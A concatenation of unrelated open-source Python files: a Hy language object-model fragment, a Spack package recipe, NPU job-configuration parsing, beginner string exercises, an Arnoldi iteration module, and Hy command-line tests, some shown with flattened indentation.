if COLORED:
return self.color + text + Fore.RESET
else:
return text
class Object(object):
"""
Generic Hy Object model. This is helpful to inject things into all the
Hy lexing Objects at once.
The position properties (`start_line`, `end_line`, `start_column`,
`end_column`) are each 1-based and inclusive. For example, a symbol
`abc` starting at the first column would have `start_column` 1 and
`end_column` 3.
"""
properties = ["module", "_start_line", "end_line", "_start_column",
"end_column"]
def replace(self, other, recursive=False):
if isinstance(other, Object):
for attr in self.properties:
if not hasattr(self, attr) and hasattr(other, attr):
setattr(self, attr, getattr(other, attr))
else:
raise TypeError("Can't replace a non Hy object '{}' with a Hy object '{}'".format(repr(other), repr(self)))
return self
@property
def start_line(self):
return getattr(self, "_start_line", 1)
@start_line.setter
def start_line(self, value):
self._start_line = value
@property
def start_column(self):
return getattr(self, "_start_column", 1)
@start_column.setter
def start_column(self, value):
self._start_column = value
def __repr__(self):
return (f"hy.models.{self.__class__.__name__}"
f"({super(Object, self).__repr__()})")
_wrappers = {}
def wrap_value(x):
"""Wrap `x` into the corresponding Hy type.
This allows replace_hy_obj to convert a non Hy object to a Hy object.
This also allows a macro to return an unquoted expression transparently.
"""
new = _wrappers.get(type(x), lambda y: y)(x)
if not isinstance(new, Object):
raise HyWrapperError("Don't know how to wrap {!r}: {!r}".format(type(x), x))
if isinstance(x, Object):
new = new.replace(x, recursive=False)
return new
def replace_hy_obj(obj, other):
return wrap_value(obj).replace(other)
def repr_indent(obj):
return repr(obj).replace("\n", "\n ")
class String(Object, str):
"""
Generic Hy String object. Helpful to store string literals from Hy
scripts. It's either a ``str`` or a ``unicode``, depending on the
Python version.
"""
def __new__(cls, s=None, brackets=None):
value = super(String, cls).__new__(cls, s)
value.brackets = brackets
return value
_wrappers[str] = String
class Bytes(Object, bytes):
"""
Generic Hy Bytes object. It's either a ``bytes`` or a ``str``, depending
on the Python version.
"""
pass
_wrappers[bytes] = Bytes
class Symbol(Object, str):
"""
Hy Symbol. Basically a string.
"""
def __new__(cls, s=None):
return super(Symbol, cls).__new__(cls, s)
_wrappers[bool] = lambda x: Symbol("True") if x else Symbol("False")
_wrappers[type(None)] = lambda foo: Symbol("None")
class Keyword(Object):
"""Generic Hy Keyword object."""
__slots__ = ['name']
def __init__(self, value):
self.name = value
def __repr__(self):
return f"hy.models.{self.__class__.__name__}({self.name!r})"
def __str__(self):
return ":%s" % self.name
def __hash__(self):
return hash(self.name)
def __eq__(self, other):
if not isinstance(other, Keyword):
return NotImplemented
return self.name == other.name
def __ne__(self, other):
if not isinstance(other, Keyword):
return NotImplemented
return self.name != other.name
def __bool__(self):
return bool(self.name)
_sentinel = object()
def __call__(self, data, default=_sentinel):
from hy.lex import mangle
try:
return data[mangle(self.name)]
except KeyError:
if default is Keyword._sentinel:
raise
return default
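    # Example of the call syntax above (comment added for clarity):
    # Keyword("foo")({"foo": 1}) returns 1, while Keyword("bar")({"foo": 1}, 2)
    # falls back to the provided default and returns 2.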
# __getstate__ and __setstate__ are required for Pickle protocol
# 0, because we have __slots__.
def __getstate__(self):
return {k: getattr(self, k)
for k in self.properties + self.__slots__
if hasattr(self, k)}
def __setstate__(self, state):
for k, v in state.items():
setattr(self, k, v)
def strip_digit_separators(number):
# Don't strip a _ or , if it's the first character, as _42 and
# ,42 aren't valid numbers
return (number[0] + number[1:].replace("_", "").replace(",", "")
if isinstance(number, str) and len(number) > 1
else number)
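# Illustrative behavior of the helper above (comment added for clarity):
# strip_digit_separators("1_000_000") == "1000000", while a leading separator
# is preserved, e.g. strip_digit_separators("_42") == "_42", so "_42" still
# fails to parse as a number later on.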
class Integer(Object, int):
"""
Internal representation of a Hy Integer. May raise a ValueError as if
int(foo) was called, given Integer(foo).
"""
def __new__(cls, number, *args, **kwargs):
if isinstance(number, str):
number = strip_digit_separators(number)
bases = {"0x": 16, "0o": 8, "0b": 2}
for leader, base in bases.items():
if number.startswith(leader):
# We've got a string, known leader, set base.
number = int(number, base=base)
break
else:
# We've got a string, no known leader; base 10.
number = int(number, base=10)
else:
# We've got a non-string; convert straight.
number = int(number)
return super(Integer, cls).__new__(cls, number)
_wrappers[int] = Integer
def check_inf_nan_cap(arg, value):
if isinstance(arg, str):
if isinf(value) and "i" in arg.lower() and "Inf" not in arg:
raise ValueError('Inf must be capitalized as "Inf"')
if isnan(value) and "NaN" not in arg:
raise ValueError('NaN must be capitalized as "NaN"')
class Float(Object, float):
"""
Internal representation of a Hy Float. May raise a ValueError as if
float(foo) was called, given Float(foo).
"""
def __new__(cls, num, *args, **kwargs):
value = super(Float, cls).__new__(cls, strip_digit_separators(num))
check_inf_nan_cap(num, value)
return value
_wrappers[float] = Float
class Complex(Object, complex):
"""
Internal representation of a Hy Complex. May raise a ValueError as if
complex(foo) was called, given Complex(foo).
"""
def __new__(cls, real, imag=0, *args, **kwargs):
if isinstance(real, str):
value = super(Complex, cls).__new__(
cls, strip_digit_separators(real)
)
p1, _, p2 = real.lstrip("+-").replace("-", "+").partition("+")
check_inf_nan_cap(p1, value.imag if "j" in p1 else value.real)
if p2:
check_inf_nan_cap(p2, value.imag)
return value
return super(Complex, cls).__new__(cls, real, imag)
_wrappers[complex] = Complex
class Sequence(Object, tuple, _ColoredModel):
"""
An abstract type for sequence-like models to inherit from.
"""
def replace(self, other, recursive=True):
if recursive:
for x in self:
replace_hy_obj(x, other)
Object.replace(self, other)
return self
def __add__(self, other):
return self.__class__(super(Sequence, self).__add__(
tuple(other) if isinstance(other, list) else other))
def __getslice__(self, start, end):
return self.__class__(super(Sequence, self).__getslice__(start, end))
def __getitem__(self, item):
ret = super(Sequence, self).__getitem__(item)
if isinstance(item, slice):
return self.__class__(ret)
return ret
color = None
def __repr__(self):
return str(self) if PRETTY else super(Sequence, self).__repr__()
def __str__(self):
with pretty():
if self:
return self._colored("hy.models.{}{}\n {}{}".format(
self._colored(self.__class__.__name__),
self._colored("(["),
self._colored(",\n ").join(map(repr_indent, self)),
self._colored("])"),
))
else:
return self._colored(f"hy.models.{self.__class__.__name__}()")
class FComponent(Sequence):
"""
Analogue of ast.FormattedValue.
The first node in the contained sequence is the value being formatted,
the rest of the sequence contains the nodes in the format spec (if any).
"""
def __new__(cls, s=None, conversion=None):
value = super().__new__(cls, s)
value.conversion = conversion
return value
def replace(self, other, recursive=True):
super().replace(other, recursive)
if hasattr(other, "conversion"):
self.conversion = other.conversion
return self
class FString(Sequence):
"""
Generic Hy F-String object, for smarter f-string handling.
Mimics ast.JoinedStr, but using String and FComponent.
"""
def __new__(cls, s=None, brackets=None):
value = super().__new__(cls, s)
value.brackets = brackets
return value
class List(Sequence):
color = Fore.CYAN
def recwrap(f):
return lambda l: f(wrap_value(x) for x in l)
_wrappers[FComponent] = recwrap(FComponent)
_wrappers[FString] = recwrap(FString)
_wrappers[List] = recwrap(List)
_wrappers[list] = recwrap(List)
_wrappers[tuple] = recwrap(List)
class Dict(Sequence, _ColoredModel):
"""
Dict (just a representation of a dict)
"""
color = Fore.GREEN
def __str__(self):
with pretty():
if self:
pairs = []
for k, v in zip(self[::2],self[1::2]):
k, v = repr_indent(k), repr_indent(v)
pairs.append(
("{0}{c}\n {1}\n "
if '\n' in k+v
else "{0}{c} {1}").format(k, v, c=self._colored(',')))
if len(self) % 2 == 1:
pairs.append("{} {}\n".format(
repr_indent(self[-1]), self._colored("# odd")))
return "{}\n {}{}".format(
self._colored("hy.models.Dict(["),
"{c}\n ".format(c=self._colored(',')).join(pairs),
self._colored("])"))
else:
return self._colored("hy.models.Dict()")
def keys(self):
return list(self[0::2])
def values(self):
return list(self[1::2])
def items(self):
return list(zip(self.keys(), self.values()))
_wrappers[Dict] = recwrap(Dict)
_wrappers[dict] = lambda d: Dict(wrap_value(x) for x in sum(d.items(), ()))
class Expression(Sequence):
"""
Hy S-Expression. Basically just a list.
"""
color = Fore.YELLOW
_wrappers[Expression] = recwrap(Expression)
_wrappers[Fraction] = lambda e: Expression(
[Symbol("fraction"), wrap_value(e.numerator), wrap_value(e.denominator)])
class Set(Sequence):
"""
Hy set (just a representation of a set)
"""
color = Fore.RED
_wrappers[Set] = recwrap(Set)
_wrappers[set] = recwrap(Set)
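# Illustrative round-trips (comment added for clarity): with the wrappers
# registered above, wrap_value([1, 2]) yields List([Integer(1), Integer(2)])
# and wrap_value({"a": 1}) yields Dict([String("a"), Integer(1)]).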
|
the-stack_0_1593 | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyPoster(PythonPackage):
"""Streaming HTTP uploads and multipart/form-data encoding."""
homepage = "https://pypi.org/project/poster/"
url = "https://atlee.ca/software/poster/dist/0.8.1/poster-0.8.1.tar.gz"
version('0.8.1', '2db12704538781fbaa7e63f1505d6fc8')
depends_on('py-setuptools', type='build')
# https://bitbucket.org/chrisatlee/poster/issues/24/not-working-with-python3
# https://bitbucket.org/chrisatlee/poster/issues/25/poster-connot-work-in-python35
# Patch created using 2to3
patch('python3.patch', when='^python@3:')
|
the-stack_0_1594 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) Huawei Technologies Co., Ltd. 2019. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Inter-process communication using HCOM."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import json
from tensorflow.python.platform import tf_logging as logging
from npu_bridge.estimator.npu import util as util_lib
class JobInfo:
"""Job information send by CSA."""
def __init__(self,
job_id=0,
job_config=None,
heartbeat_time=-1,
region_id=None,
ak=None,
sk=None,
endpoint_url=None,
device_info=None,
rank_table_file=None,
restart_flag=0,
local_app_dir=None,
local_data_dir=None,
local_checkpoint_dir=None,
local_log_dir=None,
local_result_dir=None,
local_boot_file=None,
rank_size=1
):
"""
Constructs a JobInfo.
Args:
job_id: the unique identifier.
heartbeat_time: the frequency that framework records the heartbeat.
job_config: the configuration of the training task. It's a json string.
region_id: the region id to access the OBS.
ak: the ak to access the OBS.
sk: the sk to access the OBS.
endpoint_url: the host name to access the OBS.
device_info: the device information of the training task. It's a json string.
rank_table_file: the communication routing information.
restart_flag: the abnormal re-issued ID (0: Normally issued; 1: Abnormally re-issued).
local_app_dir: the local path of the user script downloaded from OBS, for example: userfile/code/
local_data_dir: the local path of the user data downloaded from OBS, for example: userfile/data/
local_checkpoint_dir: the local path of the checkpoint file downloaded from OBS, for example: checkpoint/
local_log_dir: the user-created log path, for example: userfile/log/
local_result_dir: the user-created output file path, for example: userfile/result/
local_boot_file: the local path of the user startup script, for example: userfile/code/boot.py
rank_size: Rank size.
"""
self._job_id = job_id
self._job_config = job_config
self._heartbeat_time = heartbeat_time
self._region_id = region_id
self._ak = ak
self._sk = sk
self._endpoint_url = endpoint_url
self._device_info = device_info
self._rank_table_file = rank_table_file
self._restart_flag = restart_flag
self._local_app_dir = local_app_dir
self._local_data_dir = local_data_dir
self._local_checkpoint_dir = local_checkpoint_dir
self._local_log_dir = local_log_dir
self._local_result_dir = local_result_dir
self._local_boot_file = local_boot_file
self._rank_size = rank_size
class JobConfig():
"""Job configuration."""
def __init__(self, learning_rate=None, batch_size=None):
"""
Constructs a JobConfig.
Args:
learning_rate: A Tensor or a floating point value. The learning rate to use.
batch_size: Integer, size of batches to return.
"""
self._learning_rate = learning_rate
self._batch_size = batch_size
class DeviceInfo():
"""Device information."""
def __init__(self,
index="0",
server_id="123456",
dev_index=1):
"""
Constructs a DeviceInfo.
Args:
index: the unique identifier.
server_id: the server resource unique identifier, obtained from resource management.
dev_index: the device serial number in AI server.
"""
self._index = index
self._server_id = server_id
self._dev_index = dev_index
self._root_rank = 0
def is_master_node(self):
"""Determines whether the current node is the primary node."""
return self._index == self._root_rank
class NPUBasics(object):
"""Wrapper class for the basic NPU API."""
__instance = None
__has_init = False
def __new__(cls, file_name):
if not cls.__instance:
cls.__instance = object.__new__(cls)
return cls.__instance
def __init__(self, file_name):
if not self.__has_init:
self._job_info = self._read_job_info(file_name)
self.__has_init = True
@property
def jobinfo(self):
"""Return property"""
return self._job_info
def size(self):
"""A function that returns the number of Tensorflow processes.
Returns:
An integer scalar containing the number of Tensorflow processes.
"""
return self._job_info._rank_size
def _read_job_info(self, file_name):
"""Read the job information.
Args:
file_name: it's a json file which contains the job info from CSA.
Returns:
The job information.
"""
try:
with open(file_name, 'r', encoding='UTF-8') as f:
content = f.read()
data = json.loads(content, encoding='UTF-8')
# 1. Get the device_info and check it.
device_info = data.get('device_info')
util_lib.check_not_none(device_info, 'device_info')
index = device_info.get('Index', None)
util_lib.check_nonnegative_integer(index, 'Index')
# 2. Get the rank_table_file and check it.
rank_table_file = data.get('rank_table_file', None)
util_lib.check_not_none(rank_table_file, 'rank_table_file')
# 3. Get the rank_size and check it.
rank_size = data.get('rank_size', None)
util_lib.check_positive_integer(rank_size, 'rank_size')
# 4. Get the local_checkpoint_dir and check it.
local_checkpoint_dir = data.get('local_checkpoint_dir', None)
# 5. Init the JobInfo.
device_info = DeviceInfo(index=str(index))
job_info = JobInfo(device_info=device_info, rank_table_file=rank_table_file,
local_checkpoint_dir=local_checkpoint_dir, rank_size=rank_size)
return job_info
except IOError:
logging.warning('Warning:job config file does not exist')
job_id = os.getenv('JOB_ID', "")
if job_id == "":
logging.error('Error:can not get job config from env')
return None
heartbeat = os.getenv('HEARTBEAT', "")
rank_table_file = os.getenv('RANK_TABLE_FILE', "")
identity = os.getenv('POD_NAME', "")
if identity == "":
identity = os.getenv('RANK_ID', "")
checkpoint_dir = os.getenv('LOCAL_CHECKPOINT_DIR', "")
# cann't get rank_size from env, set to default 1
rank_size = os.getenv('RANK_SIZE', '1')
if rank_size.isdigit() is False:
print("set rank_size to default 1")
rank_size = 1
device_info = DeviceInfo(index=str(identity))
job_info = JobInfo(job_id=job_id,
heartbeat_time=heartbeat,
device_info=device_info,
rank_table_file=rank_table_file,
local_checkpoint_dir=checkpoint_dir,
rank_size=int(rank_size)
)
return job_info
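# Illustrative job-config file content (an assumed example of the JSON that
# _read_job_info() expects; all values are placeholders):
#
#     {
#         "device_info": {"Index": 0},
#         "rank_table_file": "/path/to/rank_table.json",
#         "rank_size": 8,
#         "local_checkpoint_dir": "/cache/ckpt"
#     }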
|
the-stack_0_1596 | # -*- coding: utf-8 -*-
# question 3
def count_letters(word, find):
    """
    Example function with types documented in the docstring.
    This function must return the number of occurrences of a character
    passed as a parameter within a given word.
    Parameters
    ----------
    param1 : str
        The first parameter is a string
    param2 : char
        The second parameter is the character to count
    Returns
    -------
    int
        Number of occurrences of the character
    Examples
    --------
    >>> count_letters('abracadabra', 'a')
    5
    >>> count_letters('momomotus', 'u')
    1
    """
    count = 0
    for i in range(len(word)):
        if word[i] == find:
            count += 1
    return count
# example
print(count_letters('abracadabra','a'))
# question 5
import string
def remove_punctuation(phrase):
"""
Example function with types documented in the docstring.
    This function must return a string built from an excerpt whose punctuation has been removed.
    Parameters
    ----------
    param1 : str
        The first parameter is a string
    Returns
    -------
    str
        The string passed as a parameter, without its punctuation
"""
phrase_sans_punct = ""
for letter in phrase:
if letter not in string.punctuation:
phrase_sans_punct += letter
return phrase_sans_punct
# example
print(remove_punctuation("A string, passed as a parameter, without punctuation !!!"))
# question 7
def reverse(word) :
"""
Example function with types documented in the docstring.
    This function must reverse the word given to it as a parameter
    Parameters
    ----------
    param1 : str
        The first parameter is a string (a word)
    Returns
    -------
    str
        The original word reversed
"""
new_word=""
for i in range(len(word)) :
new_word=new_word+word[-(i+1)]
return new_word
# question 8
def mirror(word) :
"""
Example function with types documented in the docstring.
    This function must return the word given to it as a parameter written as a mirror
    Parameters
    ----------
    param1 : str
        The first parameter is a string (a word)
    Returns
    -------
    str
        The original word written as if it were read in a mirror
"""
new_word=word+reverse(word)
return new_word
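# example (added for illustration, mirroring the style of the earlier examples)
print(reverse("radar"))   # prints "radar" (a palindrome)
print(mirror("abc"))      # prints "abccba"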
|
the-stack_0_1597 | """Arnoldi algorithm.
Computes V and H such that :math:`AV_n = V_{n+1}\\underline{H}_n`. If the Krylov
subspace becomes A-invariant then V and H are truncated such that :math:`AV_n = V_n
H_n`.
:param A: a linear operator that works with the @-operator
:param v: the initial vector.
:param ortho: (optional) orthogonalization algorithm: may be one of
* ``'mgs'``: modified Gram-Schmidt (default).
* ``'dmgs'``: double Modified Gram-Schmidt.
* ``'lanczos'``: Lanczos short recurrence.
* ``'householder'``: Householder.
:param M: (optional) a self-adjoint and positive-definite preconditioner. If
``M`` is provided, then also a second basis :math:`P_n` is constructed such that
:math:`V_n=MP_n`. This is of importance in preconditioned methods. ``M`` has to
be ``None`` if ``ortho=='householder'`` (see ``B``).
:param inner: (optional) defines the inner product to use. See
:py:meth:`inner`.
``inner`` has to be ``None`` if ``ortho=='householder'``. It's unclear how a
variant of the Householder QR algorithm can be used with a non-Euclidean inner
product. Compare <https://math.stackexchange.com/q/433644/36678>.
"""
import numpy as np
from ._helpers import Identity, aslinearoperator, get_default_inner
from .errors import ArgumentError
from .householder import Householder
class ArnoldiHouseholder:
def __init__(self, A, v):
self.inner = get_default_inner(v.shape)
# save parameters
self.A = A
self.v = v
self.dtype = np.find_common_type([A.dtype, v.dtype], [])
# number of iterations
self.iter = 0
# Arnoldi basis
self.V = []
# flag indicating if Krylov subspace is invariant
self.is_invariant = False
self.houses = [Householder(v)]
self.vnorm = np.linalg.norm(v, 2)
# TODO set self.is_invariant = True for self.vnorm == 0
self.V.append(v / np.where(self.vnorm != 0.0, self.vnorm, 1.0))
# if self.vnorm > 0:
# self.V[0] = v / self.vnorm
# else:
# self.is_invariant = True
def __iter__(self):
return self
def __next__(self):
"""Carry out one iteration of Arnoldi."""
if self.is_invariant:
raise ArgumentError(
"Krylov subspace was found to be invariant in the previous iteration."
)
k = self.iter
Av = self.A @ self.V[k]
for j in range(k + 1):
Av[j:] = self.houses[j] @ Av[j:]
Av[j] *= np.conj(self.houses[j].alpha)
N = self.v.shape[0]
if k < N - 1:
house = Householder(Av[k + 1 :])
self.houses.append(house)
Av[k + 1 :] = (house @ Av[k + 1 :]) * np.conj(house.alpha)
h = Av[: k + 2]
h[-1] = np.abs(h[-1])
if h[-1] <= 1.0e-14:
self.is_invariant = True
v = None
else:
vnew = np.zeros_like(self.v)
vnew[k + 1] = 1
for j in range(k + 1, -1, -1):
vnew[j:] = self.houses[j] @ vnew[j:]
v = vnew * self.houses[-1].alpha
self.V.append(v)
else:
h = np.zeros([len(Av) + 1] + list(self.v.shape[1:]), Av.dtype)
h[:-1] = Av
self.is_invariant = True
v = None
self.iter += 1
return v, h
class ArnoldiMGS:
def __init__(
self,
A,
v,
num_reorthos: int = 1,
M=None,
Mv=None,
Mv_norm=None,
inner=None,
):
self.inner = get_default_inner(v.shape) if inner is None else inner
# save parameters
self.A = A
self.v = v
self.num_reorthos = num_reorthos
self.M = Identity() if M is None else aslinearoperator(M)
self.dtype = np.find_common_type([A.dtype, self.M.dtype, v.dtype], [])
# number of iterations
self.iter = 0
# Arnoldi basis
self.V = []
self.P = []
# flag indicating if Krylov subspace is invariant
self.is_invariant = False
p = v
if Mv is None:
v = self.M @ p
else:
v = Mv
if Mv_norm is None:
            self.vnorm = np.sqrt(self.inner(p, v))
else:
self.vnorm = Mv_norm
self.P.append(p / np.where(self.vnorm != 0.0, self.vnorm, 1.0))
# TODO set self.is_invariant = True for self.vnorm == 0
self.V.append(v / np.where(self.vnorm != 0.0, self.vnorm, 1.0))
# if self.vnorm > 0:
# self.V[0] = v / self.vnorm
# else:
# self.is_invariant = True
def next_mgs(self, k, Av):
# modified Gram-Schmidt orthogonalization
for j in range(k + 1):
alpha = self.inner(self.V[j], Av)
self.h[j] += alpha
Av -= alpha * self.P[j]
def __iter__(self):
return self
def __next__(self):
if self.is_invariant:
raise ArgumentError(
"Krylov subspace was found to be invariant in the previous iteration."
)
k = self.iter
# the matrix-vector multiplication
Av = self.A @ self.V[k]
self.h = np.zeros([k + 2] + list(self.v.shape[1:]), dtype=self.dtype)
# determine vectors for orthogonalization
for _ in range(self.num_reorthos):
self.next_mgs(k, Av)
MAv = self.M @ Av
self.h[k + 1] = np.sqrt(self.inner(Av, MAv))
if np.all(self.h[k + 1] <= 1.0e-14):
self.is_invariant = True
v = None
else:
Hk1k = np.where(self.h[k + 1] != 0.0, self.h[k + 1], 1.0)
self.P.append(Av / Hk1k)
v = MAv / Hk1k
if v is not None:
self.V.append(v)
# increase iteration counter
self.iter += 1
return v, self.h
class ArnoldiLanczos:
def __init__(self, A, v, M=None, Mv=None, Mv_norm=None, inner=None):
self.A = A
self.M = Identity() if M is None else aslinearoperator(M)
self.inner = get_default_inner(v.shape) if inner is None else inner
self.dtype = np.find_common_type([A.dtype, self.M.dtype, v.dtype], [])
# number of iterations
self.num_iter = 0
# stores the three tridiagonal entries of the Hessenberg matrix
self.h = np.zeros([3] + list(v.shape[1:]), dtype=self.dtype)
# flag indicating if Krylov subspace is invariant
self.is_invariant = False
p = v
v = self.M @ p if Mv is None else Mv
        self.vnorm = np.sqrt(self.inner(p, v)) if Mv_norm is None else Mv_norm
# self.P.append(p / np.where(self.vnorm != 0.0, self.vnorm, 1.0))
# # TODO set self.is_invariant = True for self.vnorm == 0
# self.V.append(v / np.where(self.vnorm != 0.0, self.vnorm, 1.0))
self.p_old = None
self.p = p / np.where(self.vnorm != 0.0, self.vnorm, 1.0)
self.v = v / np.where(self.vnorm != 0.0, self.vnorm, 1.0)
# if self.vnorm > 0:
# self.V[0] = v / self.vnorm
# else:
# self.is_invariant = True
def __next__(self):
"""Carry out one iteration of Arnoldi."""
if self.is_invariant:
raise ArgumentError(
"Krylov subspace was found to be invariant in the previous iteration."
)
Av = self.A @ self.v
if self.num_iter > 0:
# copy the old lower-diagonal entry to the upper diagonal
self.h[0] = self.h[2]
Av -= self.h[0] * self.p_old
# orthogonalize
alpha = self.inner(self.v, Av)
# if self.ortho == "lanczos":
# # check if alpha is real
# if abs(alpha.imag) > 1e-10:
# warnings.warn(
# f"Iter {self.iter}: "
# f"abs(alpha.imag) = {abs(alpha.imag)} > 1e-10. "
# "Is your operator self-adjoint "
# "in the provided inner product?"
# )
# alpha = alpha.real
self.h[1] = alpha
Av -= alpha * self.p
MAv = self.M @ Av
self.h[2] = np.sqrt(self.inner(Av, MAv))
if np.all(self.h[2] <= 1.0e-14):
self.is_invariant = True
self.v = None
self.p = None
else:
Hk1k = np.where(self.h[2] != 0.0, self.h[2], 1.0)
self.p_old = self.p
self.p = Av / Hk1k
self.v = MAv / Hk1k
# increase iteration counter
self.num_iter += 1
return self.v, self.h, self.p
def arnoldi_res(A, V, H, inner=None):
"""Measure Arnoldi residual.
:param A: a linear operator that can be used with scipy's aslinearoperator with
``shape==(N,N)``.
:param V: Arnoldi basis matrix with ``shape==(N,n)``.
:param H: Hessenberg matrix: either :math:`\\underline{H}_{n-1}` with
``shape==(n,n-1)`` or :math:`H_n` with ``shape==(n,n)`` (if the Arnoldi basis
spans an A-invariant subspace).
:param inner: (optional) the inner product to use, see :py:meth:`inner`.
:returns: either :math:`\\|AV_{n-1} - V_n \\underline{H}_{n-1}\\|` or
:math:`\\|A V_n - V_n H_n\\|` (in the invariant case).
"""
invariant = H.shape[0] == H.shape[1]
V1 = V if invariant else V[:, :-1]
res = A * V1 - np.dot(V, H)
return np.sqrt(inner(res, res))
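# Illustrative usage sketch (an assumption for demonstration, not part of the
# original module): run a few modified-Gram-Schmidt Arnoldi steps on a small
# dense matrix and stack the computed basis vectors.
#
#     import numpy as np
#     rng = np.random.default_rng(0)
#     A = rng.standard_normal((10, 10))
#     v = rng.standard_normal(10)
#     arnoldi = ArnoldiMGS(A, v)
#     for _ in range(5):
#         _, h = next(arnoldi)
#         if arnoldi.is_invariant:
#             break
#     V = np.column_stack(arnoldi.V)  # (10, number of basis vectors)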
|
the-stack_0_1600 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright 2018 the authors.
# This file is part of Hy, which is free software licensed under the Expat
# license. See the LICENSE.
import os
import re
import shlex
import subprocess
import pytest
from hy._compat import builtins
from hy.importer import get_bytecode_path
hy_dir = os.environ.get('HY_DIR', '')
def hr(s=""):
return "hy --repl-output-fn=hy.contrib.hy-repr.hy-repr " + s
def run_cmd(cmd, stdin_data=None, expect=0, dontwritebytecode=False):
env = dict(os.environ)
if dontwritebytecode:
env["PYTHONDONTWRITEBYTECODE"] = "1"
else:
env.pop("PYTHONDONTWRITEBYTECODE", None)
cmd = shlex.split(cmd)
cmd[0] = os.path.join(hy_dir, cmd[0])
p = subprocess.Popen(cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
shell=False,
env=env)
output = p.communicate(input=stdin_data)
assert p.wait() == expect
return output
def rm(fpath):
try:
os.remove(fpath)
except (IOError, OSError):
try:
os.rmdir(fpath)
except (IOError, OSError):
pass
def test_bin_hy():
run_cmd("hy", "")
def test_bin_hy_stdin():
output, _ = run_cmd("hy", '(koan)')
assert "monk" in output
output, _ = run_cmd("hy --spy", '(koan)')
assert "monk" in output
assert "\n Ummon" in output
# --spy should work even when an exception is thrown
output, _ = run_cmd("hy --spy", '(foof)')
assert "foof()" in output
def test_bin_hy_stdin_multiline():
output, _ = run_cmd("hy", '(+ "a" "b"\n"c" "d")')
assert "'abcd'" in output
def test_bin_hy_history():
output, _ = run_cmd("hy", '''(+ "a" "b")
(+ "c" "d")
(+ "e" "f")
(.format "*1: {}, *2: {}, *3: {}," *1 *2 *3)''')
assert "'*1: ef, *2: cd, *3: ab,'" in output
output, _ = run_cmd("hy", '''(raise (Exception "TEST ERROR"))
(+ "err: " (str *e))''')
assert "'err: TEST ERROR'" in output
def test_bin_hy_stdin_comments():
_, err_empty = run_cmd("hy", '')
output, err = run_cmd("hy", '(+ "a" "b") ; "c"')
assert "'ab'" in output
assert err == err_empty
_, err = run_cmd("hy", '; 1')
assert err == err_empty
def test_bin_hy_stdin_assignment():
# If the last form is an assignment, don't print the value.
output, _ = run_cmd("hy", '(setv x (+ "A" "Z"))')
assert "AZ" not in output
output, _ = run_cmd("hy", '(setv x (+ "A" "Z")) (+ "B" "Y")')
assert "AZ" not in output
assert "BY" in output
output, _ = run_cmd("hy", '(+ "B" "Y") (setv x (+ "A" "Z"))')
assert "AZ" not in output
assert "BY" not in output
def test_bin_hy_stdin_as_arrow():
# https://github.com/hylang/hy/issues/1255
output, _ = run_cmd("hy", "(as-> 0 it (inc it) (inc it))")
assert re.match(r"=>\s+2L?\s+=>", output)
def test_bin_hy_stdin_error_underline_alignment():
_, err = run_cmd("hy", "(defmacro mabcdefghi [x] x)\n(mabcdefghi)")
assert "\n (mabcdefghi)\n ^----------^" in err
def test_bin_hy_stdin_except_do():
# https://github.com/hylang/hy/issues/533
output, _ = run_cmd("hy", '(try (/ 1 0) (except [ZeroDivisionError] "hello"))') # noqa
assert "hello" in output
output, _ = run_cmd("hy", '(try (/ 1 0) (except [ZeroDivisionError] "aaa" "bbb" "ccc"))') # noqa
assert "aaa" not in output
assert "bbb" not in output
assert "ccc" in output
output, _ = run_cmd("hy", '(if True (do "xxx" "yyy" "zzz"))')
assert "xxx" not in output
assert "yyy" not in output
assert "zzz" in output
def test_bin_hy_stdin_unlocatable_hytypeerror():
# https://github.com/hylang/hy/issues/1412
# The chief test of interest here is the returncode assertion
# inside run_cmd.
_, err = run_cmd("hy", """
(import hy.errors)
(raise (hy.errors.HyTypeError '[] (+ "A" "Z")))""")
assert "AZ" in err
def test_bin_hy_stdin_bad_repr():
# https://github.com/hylang/hy/issues/1389
output, err = run_cmd("hy", """
(defclass BadRepr [] (defn __repr__ [self] (/ 0)))
(BadRepr)
(+ "A" "Z")""")
assert "ZeroDivisionError" in err
assert "AZ" in output
def test_bin_hy_stdin_hy_repr():
output, _ = run_cmd("hy", '(+ [1] [2])')
assert "[1, 2]" in output.replace('L', '')
output, _ = run_cmd(hr(), '(+ [1] [2])')
assert "[1 2]" in output
output, _ = run_cmd(hr("--spy"), '(+ [1] [2])')
assert "[1]+[2]" in output.replace('L', '').replace(' ', '')
assert "[1 2]" in output
# --spy should work even when an exception is thrown
output, _ = run_cmd(hr("--spy"), '(+ [1] [2] (foof))')
assert "[1]+[2]" in output.replace('L', '').replace(' ', '')
def test_bin_hy_ignore_python_env():
os.environ.update({"PYTHONTEST": '0'})
output, _ = run_cmd("hy -c '(print (do (import os) (. os environ)))'")
assert "PYTHONTEST" in output
output, _ = run_cmd("hy -m tests.resources.bin.printenv")
assert "PYTHONTEST" in output
output, _ = run_cmd("hy tests/resources/bin/printenv.hy")
assert "PYTHONTEST" in output
output, _ = run_cmd("hy -E -c '(print (do (import os) (. os environ)))'")
assert "PYTHONTEST" not in output
os.environ.update({"PYTHONTEST": '0'})
output, _ = run_cmd("hy -E -m tests.resources.bin.printenv")
assert "PYTHONTEST" not in output
os.environ.update({"PYTHONTEST": '0'})
output, _ = run_cmd("hy -E tests/resources/bin/printenv.hy")
assert "PYTHONTEST" not in output
def test_bin_hy_cmd():
output, _ = run_cmd("hy -c \"(koan)\"")
assert "monk" in output
_, err = run_cmd("hy -c \"(koan\"", expect=1)
assert "Premature end of input" in err
def test_bin_hy_icmd():
output, _ = run_cmd("hy -i \"(koan)\"", "(ideas)")
assert "monk" in output
assert "figlet" in output
def test_bin_hy_icmd_file():
output, _ = run_cmd("hy -i resources/icmd_test_file.hy", "(ideas)")
